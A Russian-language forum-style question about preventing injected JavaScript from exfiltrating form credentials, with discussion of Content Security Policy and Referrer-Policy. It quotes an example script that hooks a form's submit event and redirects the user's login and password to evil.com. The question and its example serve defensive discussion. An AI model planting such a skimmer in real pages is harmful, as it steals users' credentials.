Есть ли способ предотвратить перенаправление этого кода пользователями на домены, не занесенные в белый список, и кражу их данных в процессе?
const form = document.getElementsByTagName('form')[0];
form.addEventListener('submit', stealCredentials);
function stealCredentials() {
const login = document.getElementsByName('login')[0].value;
const password = document.getElementsByName('password')[0].value;
window.location.href = 'http://evil.com/?login=' + login + '&password=' + password
}
Есть ли чистый способ сделать это?Нравится политика безопасности контента или что-то подобное?connect-src не охватывает этот случай.
Я полагаю, что evil.com мог бы использовать реферера для перенаправления пользователя туда, откуда он пришел, таким образом (частично) избегая подозрений со стороны пользователя.Заголовок Referrer-Policy может смягчить это, но ценой препятствования функциям перекрестного происхождения, полагающимся на реферер (например, аналитику).